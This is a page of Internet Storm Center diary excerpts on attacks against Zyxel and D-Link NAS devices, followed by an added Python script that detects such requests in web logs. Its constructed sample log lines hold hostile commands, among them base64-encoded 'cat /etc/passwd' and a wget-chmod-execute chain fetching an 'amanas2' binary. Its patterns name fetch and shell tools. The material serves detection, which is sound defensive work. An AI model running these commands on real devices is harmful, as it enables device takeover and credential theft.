INTERNET STORM CENTER SPOTLIGHT
ISC provides a free analysis and warning service to thousands of Internet users and organizations, and is actively working with Internet Service Providers to fight back against the most malicious attackers. https://isc.sans.edu/about.html
Another Day, Another NAS: Attacks against Zyxel NAS326 devices CVE-2023-4473, CVE-2023-4474
Published: 2024-04-30
Last Updated: 2024-04-30 15:19:40 UTC
by Johannes Ullrich (Version: 1)
Yesterday, I talked about attacks against a relatively recent D-Link NAS vulnerability. Today, scanning my honeypot logs, I found an odd URL that I didn't recognize. The vulnerability is a bit older, but the request turns out to be targeting yet another NAS.
The sample request ...
The exploit is simple: attempt to download the "amanas2" binary and execute it. Sadly, I was not able to retrieve the file. VirusTotal does flag the URL as malicious for a couple of anti-malware engines.
Oddly, I am seeing this pattern only over the last couple of days, even though the vulnerability and the PoC were disclosed last year ...
Read the full entry:
D-Link NAS Device Backdoor Abused
Published: 2024-04-29
Last Updated: 2024-04-29 13:48:03 UTC
by Johannes Ullrich (Version: 1)
At the end of March, NetworkSecurityFish disclosed a vulnerability in various D-Link NAS devices. The vulnerability allows access to the device using the user "messagebus" without credentials. The sample URL used by the PoC was ...
In addition to not requiring a password, the URL also accepts arbitrary system commands, which must be base64 encoded. Initial exploit attempts were detected as early as April 8th. The vulnerability is particularly dangerous because some affected devices are no longer supported by D-Link, and no patch is expected to be released. D-Link instead advised replacing affected devices. I have not been able to find an associated CVE number.
[Graph of hits for URLs that include "user=messagebus" with two distinct peaks. One early in April and one late in April]
After the initial exploit attempts at the beginning of the month, we now see a new distinct set of exploit attempts, some of which use different URLs to attack vulnerable systems. It appears that nas_sharing<dot>cgi is not the only endpoint that can be used to take advantage of the passwordless "messagebus" account.
Read the full entry:
https://isc.sans.edu/diary/DLink+NAS+Device+Backdoor+Abused/30878/
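Both entries describe the same detection problem: picking out, in ordinary web-server or honeypot logs, requests that hit the passwordless "messagebus" account, carry a base64-encoded system command in a query parameter, or try to fetch and run a binary such as "amanas2". The Python script below is an added example, not code from the diaries or from ISC. It scans combined-log-format lines for those three signals, decodes candidate base64 parameter values without assuming a parameter name, and counts "user=messagebus" hits per day, the series the graph in the D-Link entry shows. The log lines are constructed; the paths /cgi-bin/other.cgi and /cgi-bin/example.cgi, the parameter names payload and cmd, and the IP addresses are placeholders (assumptions), not the PoC URLs, which the diaries do not reproduce above.

```python
import base64
import re
import sys
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

# Constructed sample log lines (combined log format). IPs are documentation
# ranges; the paths and parameter names are placeholders (assumptions), not
# the PoC URLs from the diaries.
SAMPLE_LOG = """\
203.0.113.5 - - [08/Apr/2024:03:12:41 +0000] "GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&payload=aWQ7dW5hbWUgLWE= HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.23 - - [29/Apr/2024:11:05:09 +0000] "GET /cgi-bin/other.cgi?user=messagebus&payload=Y2F0IC9ldGMvcGFzc3dk HTTP/1.1" 404 0 "-" "curl/7.88.1"
192.0.2.77 - - [30/Apr/2024:07:44:13 +0000] "GET /cgi-bin/example.cgi?cmd=cd%20/tmp;wget%20http://192.0.2.9/amanas2;chmod%20777%20amanas2;./amanas2 HTTP/1.1" 404 0 "-" "-"
192.0.2.10 - - [30/Apr/2024:08:00:00 +0000] "GET /index.html?user=alice&token=Zm9vYmFyYmF6 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<day>[^:\]]+):(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
# Decoded text that looks like a shell command: metacharacters or common tools.
SHELL_HINT = re.compile(r"[;|`$]|\b(?:wget|curl|tftp|chmod|busybox|nc|uname|cat|echo|sh)\b")
# A fetch tool followed, in the same command string, by chmod, sh or ./binary.
DOWNLOAD_EXEC = re.compile(r"\b(?:wget|curl|tftp)\b.*(?:\b(?:chmod|sh)\b|\./)")
FETCH_URL = re.compile(r"\b(?:wget|curl|tftp)\b[^;|&]*?((?:https?|ftp|tftp)://[^\s;|&]+)")


def query_params(url):
    """Split a request URL into (path, [(name, value), ...]). Done by hand so
    ';' inside a value stays in the value regardless of Python version."""
    parts = urlsplit(url)
    params = []
    for piece in parts.query.split("&"):
        if piece:
            name, _, value = piece.partition("=")
            params.append((unquote_plus(name), unquote_plus(value)))
    return parts.path, params


def decode_b64_command(value):
    """Return the decoded text if value is base64 for a printable string that
    looks like a shell command; None otherwise (so ordinary tokens pass)."""
    if len(value) < 8 or not B64_RE.match(value):
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):  # bad padding/alphabet, or binary
        return None
    if not all(ch.isprintable() or ch in "\n\t" for ch in text):
        return None
    return text if SHELL_HINT.search(text) else None


def analyze(log_text):
    """Return one finding per request showing any of the three signals."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-log line; skip rather than guess
        path, params = query_params(m["url"])
        reasons, commands = [], []
        if ("user", "messagebus") in params:
            reasons.append("passwordless messagebus account")
        for name, value in params:
            decoded = decode_b64_command(value)
            if decoded is not None:
                reasons.append(f"base64-encoded command in '{name}'")
                commands.append(decoded)
            elif DOWNLOAD_EXEC.search(value):
                commands.append(value)  # plain (only URL-encoded) command chain
        for cmd in commands:
            fetch = FETCH_URL.search(cmd)
            if fetch and DOWNLOAD_EXEC.search(cmd):
                reasons.append(f"download-and-execute of {fetch.group(1)}")
        if reasons:
            findings.append({"ip": m["ip"], "day": m["day"], "path": path,
                             "status": m["status"], "reasons": reasons,
                             "commands": commands})
    return findings


def daily_messagebus_counts(log_text):
    """Requests per day whose query carries user=messagebus."""
    counts = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and ("user", "messagebus") in query_params(m["url"])[1]:
            counts[m["day"]] += 1
    return counts


if __name__ == "__main__":
    log = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LOG
    for f in analyze(log):
        print(f["day"], f["ip"], f["path"], f["status"], "; ".join(f["reasons"]))
        for cmd in f["commands"]:
            print("    cmd:", cmd)
    print("user=messagebus per day:", dict(daily_messagebus_counts(log)))
```

Run it with a log path as the first argument, or with no argument to see the constructed sample. The fourth sample line is there on purpose: "Zm9vYmFyYmF6" decodes cleanly to "foobarbaz", so a detector that flags every decodable base64 value would fire on ordinary session tokens; requiring the decoded text to contain a shell metacharacter or a known tool name is what keeps that line quiet. The messagebus check is deliberately not tied to nas_sharing.cgi, since the second wave used other endpoints against the same account.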